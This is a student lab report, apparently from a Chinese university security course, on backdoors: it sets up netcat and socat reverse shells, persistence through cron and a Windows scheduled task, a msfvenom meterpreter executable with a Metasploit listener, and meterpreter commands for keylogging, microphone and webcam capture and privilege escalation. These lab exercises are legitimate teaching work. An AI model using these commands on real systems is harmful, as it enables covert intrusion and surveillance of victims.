• 20155301实验二 后门原理与实践


    20155301实验二 后门原理与实践

    基础问题

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    答:浏览网站所附带的软件,或者在不正规的下载网站下载软件。
    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    答:通过开机自动运行脚本或者和程序绑定的方式运行。

    (3)Meterpreter有哪些给你映像深刻的功能

    答:抓取屏幕,打开摄像机和录像,感觉很恐怖。

    (4)如何发现自己有系统有没有被安装后门

    答:通过任务管理器查看有没有陌生的程序在运行,或者利用杀毒软件查杀。

    实验内容

    (1)使用netcat获取主机操作Shell,cron启动

    (2)使用socat获取主机操作Shell, 任务计划启动

    (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    实验过程

    预备任务:Windows获得Linux Shell、Linux获得Windows Shell

    1.在Windows中需要载ncat.rar,解压后即可使用

    2.利用命令行进入刚刚解压ncat的目录。

    3.利用 ncat.exe -l -p 8888 命令打开端口号为8888的端口

    4.利用nc 192.168.229.129 5301 -e /bin/sh 在Linux反弹连接windows。

    1.Linux获得Windows Shell的过程同理,在Linux运行监听指令:nc -l -p 7777 打开端口

    2.利用ncat.exe -e cmd.exe 192.229.229.130 指令Windows反弹连接Linux

    任务一:使用netcat获取主机操作Shell,cron启动

    1.首先在Windows中下载scat,解压

    2.使用crontab -e命令编辑配置文件,在最后一行或第一行添加指令04 * * * * /bin/netcat 192.168.229.130 5301 -e /bin/sh

    任务二:使用socat获取主机操作Shell, 任务计划启动

    1.在windows中,右键单击计算机,打开管理->系统工具->任务计划程序,单击创建基本任务,填写任务名称,设置触发器为当前用户登录时,设置操作为启动程序,选择启动程序为socat.exe,参数设置为tcp-listen:5301 exec:cmd.exe,pty,stderr

    这步操作的作用是把cmd绑定到端口5212,同时把cmd的Stderr复位向到stdout
    

    2.注销当前用户,并重新登录,之前创建的程序和设置的参数会自动填入运行

    任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1.在kali中利用如下命令创建一个名为5301的后门程序

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.129 LPORT=5301 -f exe > 20155301.exe
    

    2.将其通过ncat,传送到主机,在Windows中使用命令ncat.exe -l 5301 > 20155301.exe,在Kali中使用命令:nc 192.168.229.130 5301 < 20155301.exe,这样就传送过来了。

    3.MSF打开监听,输入如下指令

    root@5301:~# msfconsole
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 192.168.229.130
    msf exploit(multi/handler) > set LPORT 4444
    msf exploit(multi/handler) > show options
    msf exploit(multi/handler) > exploit
    
    
    

    4.在win7打开生成5301.exe的程序,回到kali,终端提示

    5.尝试使用命令dir,成功显示windows中的文件夹

    任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    命令 用途
    keyscan_start 启动键盘记录
    keyscan_dump 键盘记录软件的内容转储
    keyscan_stop 停止键盘记录软件
    record_mic 使用默认麦克风录音
    webcam_snap 拍照
    webcam_stream 录像
    getsystem 提权

    获取主机音频
    获取击键记录

    实验总结与体会

    这次实验并不困难,但是所达到的效果非常让我震惊,没有想到这么简单就可以进入别人的电脑并且获取你屏幕的截图甚至录像等等,这使我更加认识到了学好专业的重要性,也是我意识到网络中充斥的各种后门木马,在今后的上网或者下载中会更加的谨慎,也更加的重视定期杀毒的重要性。

  • 相关阅读:
    webstorm破解
    macos-WebStorm安裝
    CocoaPods安装与使用
    前端之HTML
    python调用百度语音(语音识别-斗地主语音记牌器)
    MySQL学习笔记(二)
    MySQL学习笔记(一)
    python网络编程
    计算机网络基础
    python之hashlib、configparser、logging模块
  • 原文地址:https://www.cnblogs.com/fengxingck/p/8688427.html
Copyright © 2020-2023  润新知